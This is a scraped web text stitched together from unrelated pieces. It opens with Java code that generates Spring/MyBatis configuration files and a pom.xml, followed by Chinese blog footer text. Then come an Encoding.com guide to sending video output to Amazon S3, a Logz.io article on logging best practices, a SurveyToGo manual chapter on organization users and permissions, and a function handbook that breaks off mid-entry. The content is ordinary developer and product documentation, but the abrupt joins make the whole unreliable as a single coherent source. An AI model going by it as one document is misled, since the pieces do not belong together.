System.out.println("generatorConfig.xml配置成功"); } else { System.out.println("generatorConfig.xml配置失败"); } //\resources\spring if (springDao(url + File.separator + "spring")) { System.out.println("spring-dao.xml配置成功"); } else { System.out.println("spring-dao.xml配置失败"); } //\resources\spring if (springService(url + File.separator + "spring")) { System.out.println("spring-service.xml配置成功"); } else { System.out.println("spring-service.xml配置失败"); } return true; } /** * 创建jdbc.properties配置文件 * * @param url 路径 * @return */ static boolean createJdbcProperties(String url) { File file = new File(url, "jdbc.properties"); String context = "jdbc.driver=org.mariadb.jdbc.Driver\n" + "jdbc.url=jdbc:mariadb://localhost:3306/" + database + "\n" + "jdbc.user="+user+"\n" + "jdbc.password="+password+""; return createFile(file, context); } /** * 创建log4j.properties日志文件 * * @param url 路径 * @return */ static boolean log4jProperties(String url) { File file = new File(url, "log4j.properties"); String context = "# Global logging configuration\n" + "log4j.rootLogger=ERROR, ooo\n" + "\n" + "# MyBatis logging configuration...\n" + "log4j.logger." + com + ".dao=DEBUG\n" + "\n" + "# 规则1,名字为 ooo,向标准输出 System.err/out\n" + "log4j.appender.ooo=org.apache.log4j.ConsoleAppender\n" + "log4j.appender.ooo.layout=org.apache.log4j.PatternLayout\n" + "log4j.appender.ooo.layout.ConversionPattern=%5p [%t] ~ %m%n\n"; return createFile(file, context); } /** * 创建mybatis-config.xml配置文件 * * @param url 路径 * @return */ static boolean mybatisConfig(String url) { File file = new File(url, "mybatis-config.xml"); String context = "<?xml version=\"1.0\" encoding=\"UTF-8\" ?>\n" + "<!DOCTYPE configuration PUBLIC \"-//mybatis.org//DTD Config 3.0//EN\" \"http://mybatis.org/dtd/mybatis-3-config.dtd\">\n" + "\n" + "\n" + "<configuration>\n" + " <settings>\n" + " <!-- 使用jdbc的getGeneratedKeys获取数据库自增主键值 -->\n" + " <setting name=\"useGeneratedKeys\" value=\"true\" />\n" + " <!-- 使用列别名替换列名 默认:true -->\n" + " <setting name=\"useColumnLabel\" value=\"true\" />\n" + " <!-- 开启驼峰命名转换:Table {create_time} -> Entity {createTime} -->\n" + " <setting name=\"mapUnderscoreToCamelCase\" value=\"true\" />\n" + " </settings>\n" + "\n" + " <plugins>\n" + " <plugin interceptor=\"com.github.pagehelper.PageInterceptor\" />\n" + " </plugins>\n" + "</configuration>"; return createFile(file, context); } /** * 创建spring-web.xml配置文件 * * @return */ static boolean springWeb(String url) { File file = new File(url, "spring-web.xml"); String context = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" + "<beans xmlns=\"http://www.springframework.org/schema/beans\"\n" + " xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n" + " xmlns:context=\"http://www.springframework.org/schema/context\"\n" + " xmlns:mvc=\"http://www.springframework.org/schema/mvc\"\n" + " xsi:schemaLocation=\"http://www.springframework.org/schema/beans\n" + "\thttp://www.springframework.org/schema/beans/spring-beans.xsd\n" + "\thttp://www.springframework.org/schema/context\n" + "\thttp://www.springframework.org/schema/context/spring-context.xsd\n" + "\thttp://www.springframework.org/schema/mvc\n" + "\thttp://www.springframework.org/schema/mvc/spring-mvc-3.0.xsd\">\n" + " <!-- 配置SpringMVC -->\n" + " <!-- 1.开启SpringMVC注解模式 -->\n" + " <!-- 简化配置:\n" + " (1)自动注册DefaultAnootationHandlerMapping,AnotationMethodHandlerAdapter\n" + " (2)提供一些列:数据绑定,数字和日期的format @NumberFormat, @DateTimeFormat, xml,json默认读写支持\n" + " -->\n" + " <mvc:annotation-driven />\n" + "\n" + " <!-- 2.静态资源默认servlet配置\n" + " (1)加入对静态资源的处理:js,gif,png\n" + " (2)允许使用\"/\"做整体映射\n" + " -->\n" + " <mvc:default-servlet-handler/>\n" + "\n" + " <!-- 3.配置jsp 显示ViewResolver -->\n" + " <bean class=\"org.springframework.web.servlet.view.InternalResourceViewResolver\">\n" + " <property name=\"viewClass\" value=\"org.springframework.web.servlet.view.JstlView\" />\n" + " <property name=\"prefix\" value=\"/WEB-INF/jsp/\" />\n" + " <property name=\"suffix\" value=\".jsp\" />\n" + " </bean>\n" + " <!-- 4.扫描web相关的bean -->\n" + " <context:component-scan base-package=\"" + com + ".controller\" />\n" + "</beans>"; return createFile(file, context); } /** * 创建spring-dao.xml配置文件 * * @param url 路径 * @return */ static boolean springDao(String url) { File file = new File(url, "spring-dao.xml"); String context = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" + "<beans xmlns=\"http://www.springframework.org/schema/beans\"\n" + " xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n" + " xmlns:tx=\"http://www.springframework.org/schema/tx\" xmlns:context=\"http://www.springframework.org/schema/context\"\n" + " xsi:schemaLocation=\"http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd http://www.springframework.org/schema/tx http://www.springframework.org/schema/tx/spring-tx.xsd http://www.springframework.org/schema/context http://www.springframework.org/schema/context/spring-context.xsd\">\n" + "\n" + "\n" + "\n" + " <!-- 配置整合mybatis过程 -->\n" + " <!-- 1.配置数据库相关参数properties的属性:${url} -->\n" + " <context:property-placeholder location=\"classpath:jdbc.properties\" />\n" + "\n" + " <!-- 2.数据库连接池 -->\n" + " <bean id=\"dataSource\" class=\"com.mchange.v2.c3p0.ComboPooledDataSource\">\n" + " <property name=\"driverClass\" value=\"${jdbc.driver}\" />\n" + " <property name=\"jdbcUrl\" value=\"${jdbc.url}\" />\n" + " <property name=\"user\" value=\"${jdbc.username}\" />\n" + " <property name=\"password\" value=\"${jdbc.password}\" />\n" + "\n" + " <!-- c3p0连接池的私有属性 -->\n" + " <property name=\"maxPoolSize\" value=\"30\" />\n" + " <property name=\"minPoolSize\" value=\"10\" />\n" + " <!-- 关闭连接后不自动commit -->\n" + " <property name=\"autoCommitOnClose\" value=\"false\" />\n" + " <!-- 获取连接超时时间 -->\n" + " <property name=\"checkoutTimeout\" value=\"10000\" />\n" + " <!-- 当获取连接失败重试次数 -->\n" + " <property name=\"acquireRetryAttempts\" value=\"2\" />\n" + " </bean>\n" + "\n" + " <!-- 3.配置SqlSessionFactory对象 -->\n" + " <bean id=\"sqlSessionFactory\" class=\"org.mybatis.spring.SqlSessionFactoryBean\">\n" + " <!-- 注入数据库连接池 -->\n" + " <property name=\"dataSource\" ref=\"dataSource\" />\n" + " <!-- 配置MyBaties全局配置文件:mybatis-config.xml -->\n" + " <property name=\"configLocation\" value=\"classpath:mybatis-config.xml\" />\n" + " <!-- 扫描entity包 使用别名 -->\n" + " <property name=\"typeAliasesPackage\" value=\"" + com + ".entity\" />\n" + " <!-- 扫描sql配置文件:mapper需要的xml文件 -->\n" + " <property name=\"mapperLocations\" value=\"classpath:mapper/*.xml\" />\n" + " </bean>\n" + "\n" + " <!-- 4.配置扫描Dao接口包,动态实现Dao接口,注入到spring容器中 -->\n" + " <bean class=\"org.mybatis.spring.mapper.MapperScannerConfigurer\">\n" + " <!-- 注入sqlSessionFactory -->\n" + " <property name=\"sqlSessionFactoryBeanName\" value=\"sqlSessionFactory\" />\n" + " <!-- 给出需要扫描Dao接口包 -->\n" + " <property name=\"basePackage\" value=\"" + com + ".dao\" />\n" + " </bean>\n" + "\n" + " <!--配置声明式事务管理-->\n" + " <bean id=\"transactionManager\" class=\"org.springframework.jdbc.datasource.DataSourceTransactionManager\">\n" + " <property name=\"dataSource\" ref=\"dataSource\" />\n" + " </bean>\n" + " <tx:annotation-driven proxy-target-class=\"true\" />\n" + "\n" + "</beans>"; return createFile(file, context); } /** * 创建spring-service.xml配置文件 * * @param url 路径 * @return */ static boolean springService(String url) { File file = new File(url, "spring-service.xml"); String context = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" + "<beans xmlns=\"http://www.springframework.org/schema/beans\"\n" + " xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n" + " xmlns:context=\"http://www.springframework.org/schema/context\"\n" + " xmlns:tx=\"http://www.springframework.org/schema/tx\" xmlns:mvc=\"http://www.springframework.org/schema/mvc\"\n" + " xmlns:aop=\"http://www.springframework.org/schema/aop\"\n" + " xsi:schemaLocation=\"http://www.springframework.org/schema/beans\n" + "\thttp://www.springframework.org/schema/beans/spring-beans.xsd\n" + "\thttp://www.springframework.org/schema/context\n" + "\thttp://www.springframework.org/schema/context/spring-context.xsd\n" + " http://www.springframework.org/schema/mvc http://www.springframework.org/schema/mvc/spring-mvc.xsd http://www.springframework.org/schema/aop http://www.springframework.org/schema/aop/spring-aop.xsd\">\n" + " <!-- 扫描service包下所有使用注解的类型 -->\n" + " <context:component-scan base-package=\"" + com + ".service\" />\n" + " <mvc:annotation-driven />\n" + " <!-- 启用 aspectj 方式 AOP-->\n" + " <aop:aspectj-autoproxy proxy-target-class=\"true\" />\n" + "</beans>"; return createFile(file, context); } /** * 创建generatorConfig.xml配置文件 * @param url * @return */ static boolean generatorConfig(String url) { File file = new File(url, "generatorConfig.xml"); String context = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" + "<!DOCTYPE generatorConfiguration\n" + " PUBLIC \"-//mybatis.org//DTD MyBatis Generator Configuration 1.0//EN\"\n" + " \"http://mybatis.org/dtd/mybatis-generator-config_1_0.dtd\">\n" + "\n" + "<generatorConfiguration>\n" + "\n" + " <context id=\"xxx\" targetRuntime=\"MyBatis3Simple\">\n" + "\n" + "\n" + " <commentGenerator>\n" + " <property name=\"suppressDate\" value=\"true\" />\n" + " </commentGenerator>\n" + " <!-- 数据库连接 -->\n" + " <jdbcConnection driverClass=\"org.mariadb.jdbc.Driver\"\n" + " connectionURL=\"jdbc:mariadb://localhost/"+database+"\"\n" + " userId=\""+user+"\" password=\""+password+"\">\n" + " </jdbcConnection>\n" + "\n" + " <!-- Model生成规则 -->\n" + " <javaModelGenerator targetPackage=\""+com+".entity\" targetProject=\"src/main/java\">\n" + " <property name=\"trimStrings\" value=\"true\" />\n" + " </javaModelGenerator>\n" + "\n" + " <sqlMapGenerator targetPackage=\"mapper\" targetProject=\"src/main/resources\"/>\n" + " <!-- dao 规则 -->\n" + " <javaClientGenerator type=\"XMLMAPPER\" targetPackage=\""+com+".dao\" targetProject=\"src/main/java\">\n" + " <property name=\"enableSubPackages\" value=\"true\" />\n" + " </javaClientGenerator>\n" + " <table tableName=\"%\">\n" + " <generatedKey column=\"id\" sqlStatement=\"Mysql\"/>\n" + " </table>\n" + " </context>\n" + "</generatorConfiguration>"; return createFile(file, context); } //***********************webapp************************ static boolean createWebapp(String url) { if (webXml(url + File.separator + "WEB-INF")) { System.out.println("web.xml配置成功"); } else { System.out.println("web.xml配置失败"); } createCSSJSDirectory(url + File.separator); return true; } /** * 创建WEB-INF\web.xml配置文件 * * @param url 路径 * @return */ static boolean webXml(String url) { File file = new File(url, "web.xml"); String context = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" + "<web-app xmlns=\"http://xmlns.jcp.org/xml/ns/javaee\"\n" + " xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n" + " xsi:schemaLocation=\"http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd\"\n" + " version=\"4.0\">\n" + "\n" + " <display-name>自动生成</display-name>\n" + "\n" + " <!--解决中文乱码-->\n" + " <filter>\n" + " <filter-name>encodingFilter</filter-name>\n" + " <filter-class>org.springframework.web.filter.CharacterEncodingFilter</filter-class>\n" + " <async-supported>true</async-supported>\n" + " <init-param>\n" + " <param-name>encoding</param-name>\n" + " <param-value>UTF-8</param-value>\n" + " </init-param>\n" + "\n" + " </filter>\n" + " <filter-mapping>\n" + " <filter-name>encodingFilter</filter-name>\n" + " <url-pattern>/*</url-pattern>\n" + " </filter-mapping>\n" + "\n" + " <!--配置 Spring 的容器-->\n" + " <context-param>\n" + " <param-name>contextConfigLocation</param-name>\n" + " <param-value>classpath:spring/spring-*.xml</param-value>\n" + " </context-param>\n" + " <listener>\n" + " <listener-class>org.springframework.web.context.ContextLoaderListener</listener-class>\n" + " </listener>\n" + "\n" + " <!--配置 MVC 容器-->\n" + " <!--将所有的请求都交给 Spring MVC 处理-->\n" + " <servlet>\n" + " <servlet-name>app</servlet-name>\n" + " <servlet-class>org.springframework.web.servlet.DispatcherServlet</servlet-class>\n" + " <init-param>\n" + " <param-name>contextConfigLocation</param-name>\n" + " <param-value>classpath:spring-web.xml</param-value>\n" + " </init-param>\n" + " </servlet>\n" + " <servlet-mapping>\n" + " <servlet-name>app</servlet-name>\n" + " <url-pattern>/</url-pattern>\n" + " </servlet-mapping>\n" + "</web-app>"; return createFile(file, context); } /** * 创建css和js * * @param url 路径 */ static boolean createCSSJSDirectory(String url) { File fcss = new File(url + "css"); if (fcss.mkdirs()) { System.out.println("成功创建css文件夹"); } File fjs = new File(url + "js"); if (fjs.mkdirs()) { System.out.println("成功创建js文件夹"); } return true; } /** * @param file 创建的文件 * @param context 文件里面的内容 */ static boolean createFile(File file, String context) { //获取文件 File parent = file.getParentFile(); //如果是目录 if (parent != null) { //创建目录 parent.mkdirs(); } try { //创建文件 file.createNewFile(); FileWriter fileWriter = null; try { fileWriter = new FileWriter(file); fileWriter.write(context); fileWriter.flush(); fileWriter.close(); } catch (IOException e) { return false; } } catch (IOException e) { System.out.println("创建文件失败:" + e.getMessage()); } return true; } //***********************pom.xml************************ /** * 配置pom.xml文件 * * @param url 路径 */ static String configPomXml(String url) { File file = new File(url, "pom.xml"); InputStream inputStream = null; byte b[] = new byte[Integer.parseInt(String.valueOf(file.length()))]; StringBuffer stringBuffer = null; try { inputStream = new FileInputStream(file); inputStream.read(b); inputStream.close(); stringBuffer = new StringBuffer(new String(b)); stringBuffer.replace(Integer.parseInt(String.valueOf(file.length())) - 10, Integer.parseInt(String.valueOf(file.length())), ""); stringBuffer.append(pomContext()); } catch (Exception e) { return "程序出错,请重试 -- pom.xml文件配置失败"; } if (createFile(file, stringBuffer.toString())) { return "pom.xml文件配置完成"; } return "pom.xml文件配置失败"; } /** * pom.xml配置文件需要加的配置 * * @return */ static String pomContext() { return "<!--打包-->\n" + " <packaging>war</packaging>\n" + " <!--设置编码-->\n" + " <properties>\n" + " <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>\n" + " <maven.compiler.source>1.8</maven.compiler.source>\n" + " <maven.compiler.target>1.8</maven.compiler.target>\n" + " <spring.version>5.1.0.RELEASE</spring.version>\n" + " </properties>\n" + " <!--引入文件-->\n" + " <dependencies>\n" + " <!-- Spring Web MVC -->\n" + " <dependency>\n" + " <groupId>org.springframework</groupId>\n" + " <artifactId>spring-web</artifactId>\n" + " <version>${spring.version}</version>\n" + " </dependency>\n" + " <dependency>\n" + " <groupId>org.springframework</groupId>\n" + " <artifactId>spring-webmvc</artifactId>\n" + " <version>${spring.version}</version>\n" + " </dependency>\n" + "\n" + " <!-- servlet 系列的支持 -->\n" + " <dependency>\n" + " <groupId>javax</groupId>\n" + " <artifactId>javaee-api</artifactId>\n" + " <version>8.0</version>\n" + " <scope>provided</scope>\n" + " </dependency>\n" + " <dependency>\n" + " <groupId>javax.servlet</groupId>\n" + " <artifactId>jstl</artifactId>\n" + " <version>1.2</version>\n" + " </dependency>\n" + "\n" + " <dependency>\n" + " <groupId>com.github.pagehelper</groupId>\n" + " <artifactId>pagehelper</artifactId>\n" + " <version>5.1.7</version>\n" + " </dependency>\n" + "\n" + " <!-- Springframework -->\n" + " <dependency>\n" + " <groupId>org.springframework</groupId>\n" + " <artifactId>spring-context</artifactId>\n" + " <version>${spring.version}</version>\n" + " </dependency>\n" + " <dependency>\n" + " <groupId>org.springframework</groupId>\n" + " <artifactId>spring-jdbc</artifactId>\n" + " <version>${spring.version}</version>\n" + " </dependency>\n" + " <dependency>\n" + " <groupId>org.springframework</groupId>\n" + " <artifactId>spring-aop</artifactId>\n" + " <version>${spring.version}</version>\n" + " </dependency>\n" + " <dependency>\n" + " <groupId>org.aspectj</groupId>\n" + " <artifactId>aspectjweaver</artifactId>\n" + " <version>1.9.1</version>\n" + " </dependency>\n" + "\n" + " <!-- MyBatis -->\n" + " <dependency>\n" + " <groupId>org.mybatis</groupId>\n" + " <artifactId>mybatis</artifactId>\n" + " <version>3.4.6</version>\n" + " </dependency>\n" + " <dependency>\n" + " <groupId>org.mybatis</groupId>\n" + " <artifactId>mybatis-spring</artifactId>\n" + " <version>1.3.2</version>\n" + " </dependency>\n" + "\n" + " <!-- 数据库驱动以及数据库连接池-->\n" + " <dependency>\n" + " <groupId>org.mariadb.jdbc</groupId>\n" + " <artifactId>mariadb-java-client</artifactId>\n" + " <version>2.3.0</version>\n" + " </dependency>\n" + " <dependency>\n" + " <groupId>com.mchange</groupId>\n" + " <artifactId>c3p0</artifactId>\n" + " <version>0.9.5.2</version>\n" + " </dependency>\n" + "\n" + " <!-- 日志框架 -->\n" + " <dependency>\n" + " <groupId>log4j</groupId>\n" + " <artifactId>log4j</artifactId>\n" + " <version>1.2.17</version>\n" + " </dependency>\n" + "\n" + " <!-- 通用工具 -->\n" + " <dependency>\n" + " <groupId>com.fasterxml.jackson.core</groupId>\n" + " <artifactId>jackson-databind</artifactId>\n" + " <version>2.9.7</version>\n" + " </dependency>\n" + "\n" + " <!-- 单元测试 -->\n" + " <dependency>\n" + " <groupId>org.springframework</groupId>\n" + " <artifactId>spring-test</artifactId>\n" + " <version>${spring.version}</version>\n" + " <scope>test</scope>\n" + " </dependency>\n" + "\n" + " <dependency>\n" + " <groupId>junit</groupId>\n" + " <artifactId>junit</artifactId>\n" + " <version>4.12</version>\n" + " <scope>test</scope>\n" + " </dependency>\n" + " </dependencies>\n" + " <build>\n" + " <finalName>contact</finalName>\n" + " <plugins>\n" + " <plugin>\n" + " <groupId>org.mybatis.generator</groupId>\n" + " <artifactId>mybatis-generator-maven-plugin</artifactId>\n" + " <version>1.3.7</version>\n" + " <dependencies>\n" + " <dependency>\n" + " <groupId>org.mariadb.jdbc</groupId>\n" + " <artifactId>mariadb-java-client</artifactId>\n" + " <version>2.3.0</version>\n" + " </dependency>\n" + " </dependencies>\n" + " </plugin>\n" + " </plugins>\n" + "\n" + " <pluginManagement><!-- lock down plugins versions to avoid using Maven defaults (may be moved to parent pom) -->\n" + " <plugins>\n" + " <plugin>\n" + " <artifactId>maven-clean-plugin</artifactId>\n" + " <version>3.0.0</version>\n" + " </plugin>\n" + " <!-- see http://maven.apache.org/ref/current/maven-core/default-bindings.html#Plugin_bindings_for_war_packaging -->\n" + " <plugin>\n" + " <artifactId>maven-resources-plugin</artifactId>\n" + " <version>3.0.2</version>\n" + " </plugin>\n" + " <plugin>\n" + " <artifactId>maven-compiler-plugin</artifactId>\n" + " <version>3.7.0</version>\n" + " </plugin>\n" + " <plugin>\n" + " <artifactId>maven-surefire-plugin</artifactId>\n" + " <version>2.20.1</version>\n" + " </plugin>\n" + " <plugin>\n" + " <artifactId>maven-war-plugin</artifactId>\n" + " <version>3.2.0</version>\n" + " </plugin>\n" + " <plugin>\n" + " <artifactId>maven-install-plugin</artifactId>\n" + " <version>2.5.2</version>\n" + " </plugin>\n" + " <plugin>\n" + " <artifactId>maven-deploy-plugin</artifactId>\n" + " <version>2.8.2</version>\n" + " </plugin>\n" + " </plugins>\n" + " </pluginManagement>\n" + " </build>\n\n" + "</project>"; } } View Code  运行后   发布评论 分享到: IT源码网 微信公众号号:IT虾米 (左侧二维码扫一扫)欢迎添加! 简单使用hibernate(idea中使用)讲解 你是第一个吃螃蟹的人 发表评论 ◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。
__label__pos
0.89624
Sending output to Amazon S3 To deliver your output video files to a bucket on your Amazon S3 account, follow these steps below. Although there are many steps, it’s quite easy!   NOTE: Before downloading, it’s important that you’ve done some basic setup on your Amazon S3 account.   1. On the right side of the same page (on which you see information about your uploaded video), notice the column labeled Step Two. Click the + symbol to expand the Job Notification and Region section. 2. From the Region dropdown listing, choose the region corresponding to the location in which your destination server resides. 3. If you want to receive notification when the conversion process completes, enter an email address or URL into the Notify URL field. The URL must be the HTTP location of a listening script that can receive the XML notification file that Encoding.com will send.   job settings   1. In the Output Format #1 section, choose the output format—such as H264/AVC (.mp4)— in the first dropdown listing. [crossref to Output formats] 2. In the next dropdown listing, choose the encoding preset. [crossref to encoding types] 3. Next, choose S3 for the destination type. Then click the link to enter the destination credentials individually. 4. In the AWS Key field, enter your Amazon S3 Access Key. In the AWS Secret Key field, enter your Amazon S3 Secret Access Key. 5. Enter the name of your Bucket. In our example we are using videooutput_denver. 6. Enter the Object, which is the name of the output video file. You must include the extension (e.g., .mov or .wmv). Be sure to correctly include capitalization where necessary. You will probably want to use an extension that corresponds to the output format. In our example here the path would be /KingLines.mp4 7. Notice that the path in the textbox now corresponds to the entries you made. 8. You may want to add another delivery location for your output video file. Next to the path field (Where should we send your video?), click the + symbol to add another delivery destination. Then follow the same steps given above. 9. Click Save. 10. If you need to make changes to the output settings, click the Customize button. Enter a Preset Name, and then click Save Custom Preset. Then click the Save button again.   S3 Job Config     1. If you want to convert your source to a second output format, click the + symbol next to add another output format. Follow the steps given above. 2. After confirming that all of your entries are correct, click the Process Video button. 3. The status page will appear. If successful, you’ll see a Processing indicator.   S3 Job Config   1. To see details, click the + symbol next to the media ID number.   Extended Info   1. To see more details, click the Processing link. A pop-up window will appear giving the details of the conversion process.   Job Log   1. When the job is done, you will see the Finished status. Click the  View/Download link to access your output video file.   View Download Link       1 Star2 Stars3 Stars4 Stars5 Stars (No Ratings Yet) Loading... edchelp
__label__pos
0.587141
How to Instrument Application Logging Implementing logging in our applications is a key component in making them more observable. Maintaining consistent structure and instrumenting logging from the very first function or service will help us gain the visibility we need into how our code is performing. But how do we do this? The practical answer to this question depends of course on our code — what programming language are we using, what specific logging framework are we working with, and plenty more. However, there is a set of general best practices that can and should be adhered to in order to ensure logging is embedded correctly in our application. What are we logging? Some recommend logging as much as possible as a best practice. Fact is, that in some cases, we’ve seen this “log as if there is no tomorrow” approach result in: a) log noise comprised of unimportant data, and b) needlessly expensive logging costs for storage and retention. Once you’ve understood what you’re aiming to achieve with your logging, you can begin devising a strategy that defines what you want to log, and perhaps even more importantly — what you don’t want to log. If you are planning to build alerts on top of the logs, for example, try and log actionable data. What logging framework do we use Logging frameworks give developers a mechanism to implement logging in a standard and easy-to-configure way. They allow developers to control verbosity, define log levels, configure multiple connections or targets, devise a log rotation policy, and so forth. You could build your own logging framework, but why do that if there are already tools out there that are easy to use, have community support, and most importantly — do the job perfectly well? So one of the most important decisions you will make is which logging library, or framework, to use. This task can be complicated at times and pretty time consuming as there are a large number of these tools available, but key considerations here should be ease of use, community, feature-richness, and the impact on your application’s performance.   Standardizing logs The more standardized your logs, the easier it is to parse them and subsequently analyze them.  The logging framework you end up using will help you with this, but there is still plenty of work to be done to ensure your log messages are all constructed the same way. For starters, be sure that developers understand when to use each log level. This will help avoid situations in which the same log message is assigned the same severity or where critical events go unnoticed because of the wrong severity assigned to it. Second, create a standard for formatting and naming fields. Decide, for example, if the field containing the request is “request” or “requestUrl”. Choose the format you want to use for the timestamp field. Think about whether you want to format your logs in JSON or as key=value pairs (this will depend on how you intend on collecting and analyzing the logs). How do we format our logs? Formatting structures your logs. Structuring, in turn, helps both machines and humans read the data more efficiently. In this context, the most commonly used formatting methods are JSON and KVPs (key=value pairs). Below are examples of the same log message written in both format types. JSON: {  “@timestamp”: “2017-07025 17:02:12”,  “level”: “error”,  “message”: “connection refused”,  “service”: “listener”,  “thread”: “125”,  “customerid”: “776622”,  “ip”: “34.124.233.12”,  “queryid”: “45” } KVP: 2017-07025 17:02:12 level=error message="connection refused" service="listener" thread=125 customerid=776622 ip=34.124.233.12 queryid=45 Both formats will help you achieve the same purpose — making the logs human readable and enable more efficient parsing and analysis, but which one you choose to use will depend on the analysis tool you want to use. If it’s the ELK Stack, for example, JSON is the format that you should probably try. Adding context Being concise and logging short messages is in general a good law to abide by. But there is a huge difference between writing concise logs and writing incomprehensible logs. Consider this log message: 12-19-17 13:40:42:000 login failed. Not very insightful, right? But how about: 12-19-17 13:40:42:000 userId=23 action=login status=failure In logging, context is everything. Adding contextual information to your log messages creates a story and allows you, and any other party in your organization, to more easily understand and analyze the data. Part of the context that can be added to logs are fields containing metadata. Common examples are application name, function name, class name, and so on.     Using unique identifiers When troubleshooting a specific event using logs, one can easily get lost in the data. Without having some kind of map to use as reference, especially microservice-based architectures, it’s virtually impossible to track specific actions across all the different services involved in the transaction. Adding unique tags or IDs to the logs, when possible, will help you navigate within the data by following specific identifying labels that are passed through the different processing steps. These could be user IDs, transaction IDs, account IDs, and others. Centralized logging Once your application is shipping logs, the next practical step is to figure out how to efficiently aggregate, process, and analyze it. This implies selecting a tool, and in this context the most popular open source tool of choice is the ELK Stack — Elasticsearch, Logstash, and Kibana. The ELK Stack is relatively easy to set up, provides users with the tools to collect log data from multiple data sources, store it in one centralized location, and analyze it with queries and visualizations. Depending on how you are outputting your logs, you will need to figure out how to construct your data pipeline. Keep it as simple as possible — ELK handles JSON documents quite well, and if you consistently adhere to a united structure, then you will see some pretty good results. As your code and application grows, the challenge of maintaining a production-grade ELK Stack grows with it. There are various hosted ELK solutions that will help you concentrate on coding and developing new functionality instead of maintaining the stack itself. Logz.io is one such solution, offering a bunch of features missing in the open source version of ELK on top of the stack, such as alerts, security, Live Tail and S3 archiving. Planning is Key Logging your application requires some thought, and the earlier you plan and strategize instrumentation the better. The list of best practices above contains some basic steps that can be implemented from the start. More often than not, developers apply logging as an afterthought or after a critical issue already impacts the application. Why wait for that to happen before implementing a system for keeping track of your product?   Meet The Author Subscribe to Our Blog
__label__pos
0.879629
Archive Archive for the ‘Studio Manual’ Category Chapter 3.1 – Managing an Organization with multiple users and groups September 3, 2014 Leave a comment Back to Table Of Contents Back to Chapter 2.5 – Creating a basic Survey Overview An organization represents your company’s private space in SurveyToGo. Once you register for a SurveyToGo account an organization is created for you with the name you specified as your company and you can see your organization name listed on the root node in the SurveyToGo Studio:   You should only register once per company and if you need to grant other people from your company access to SurveyToGo – just create users for them and send them the user details and organization name. Only you and the users that you create have access to your organization. All the surveys that you will create will be created in your organization and cannot be accessed by anyone other than you and the users that you create. You can also change the properties and contact details of your organization by right clicking on the organization node and clicking on the “Organization Properties”:   What are Organization Users and how do create a new one? SurveyToGo includes 2 types of users: • Organization users • Surveyor users Organization users are users that are in charge of managing customers, operations & projects and are not the ones performing the actual surveys in the field. Surveyor users are users that are responsible for actually conducting the surveys in field. By default the surveyors do not have access to the Studio. Both user types have a password and a user name and you can define as many users as needed of each type. You can also organize them into relevant groups for easier maintenance.   1. Step 1: Create Organization User 2. Step 2: Adding multiple users 3. Step 3: provide organization users with access to projects? 4. Step 4: create new groups of organization users?   Step 1: Create Organization User To create an Organization User you right click the “Users” folder of the “Studio Users & Groups” node: You then enter the details of the organization user: You need to make sure you give out a user name and a password for each organization user that you create. Once you are done filling out the information click the “Create” button. ** The way to add surveyor users is the same, by right-click on the Users folder of the “Surveyor Users & Groups” node.   Step 2: Adding multiple users Please view this link to see how you can add multiple users at once: http://support.dooblo.net/entries/28420962-How-to-create-multiple-users   Step 3: provide organization users with access to projects? After you define all the users of your organization, you can assign them to the projects to give them access to the project. To do this, right click on the project and choose “Security Settings”: This will bring up the security management screen where you can add the relevant user / group with the relevant permission: You can then add the users you defined to the various roles of this project: Role Description Administrators Project administrators have full rights on the project to both modify, delete, and view data Managers Project managers have full rights to modify and view the data of the project but do not have rights to delete data Reviewers Have the same rights as managers as of now Readers Only have rights to read data and do NOT have any right to change data   ** please note that in order for this user to be able to create new surveys and projects, the user needs to be a part of the Survey-Managers group. To add a user to this group, expand the groups node and right click the Survey-Managers group: Then click the “Add” button to add more users to this group:   Step 4: create new groups of organization users? Adding a new group of organization users is easy, simple right click the “groups” node and select “create new group” option: This will open up the new group screen and will allow you to add members to this group. You can then later add this group as project managers as shown above. To change the rights of a group you can right click that group and select the “Group Rights”: This will show you the group rights screen.   That’s it! Go To Chapter 3.2 – Managing project data and operations Back to Table Of Contents Visit us at: http://www.dooblo.net     Categories: Studio Manual Script Writer’s Function Hand-Book August 15, 2012 1 comment This document contains most of the common every-day usable functions in SurveyToGo. Explained, demonstrated and elaborated. This document is directly connected to us, and is constantly updated with new functions and info by our professional team, stay updated! A Survey Script Writers True Gem! FilterAnswersByAnswers \ FilterTopicsByAnswers: Explanation: This function gets a target question index and a source question. It filters the Current Question’s answers through, according to the answers chosen in the source questions specified. Input: Gets 2 Parameters 1st Parameter: The Target Question. 2nd Parameter: A Boolean value – ‘true’ for showing answers selected, ‘false’ for showing answers not selected. 3rd Parameter: The Source Questions. Output: Filters the specified answer index’s Example of How to write: FilterAnswersByAnswers(CurrQues,true,QRef(15)); FilterAnswersByAnswers(CurrQues, true,QRef(15),QRef(16),QRef(17)); FilterTopicsByAnswers(3, false,QRef(2)); SelectedAnswerText: Explanation: This function gets a target question index and returns the text of the answer selected Input: Gets 2 Parameters. 1st Parameter: The Target Question index. 2nd Parameter: A Boolean value – ‘true’ for getting the ‘Other Specify’ input too, ‘false’ for not getting the ‘Other Specify’ input text. Output: Text of the answer selected Example of How to write: SelectedAnswerText (5,true); SelectedAnswerText (2, false); Answer: Explanation: This function gets a target question index of only single choice questions such as: (Single-Choice, Numeric, Open Ended, Scale, Expression) and returns its selected answer index. Input: Gets 1 Parameters 1st Parameter: The Target Question. Output: Returns its selected answer index Example of How to write: Answer(CurrQues); Contains: Explanation: This function gets a target question index of only Multi-Selection questions and an answer index, and checks if this answer was selected. Input: Gets 2 Parameters 1st Parameter: The Target Question Index. 2nd Parameter: The Target Answer Index. Output: returns ‘True’ if the given answer was selected – returns ‘False’ if the given answer was not selected. Example of How to write: Contains(2,1); SetAnswerVisible \ SetTopicVisible: Explanation: This function gets a target question index, a answer\topic index, and a Boolean value 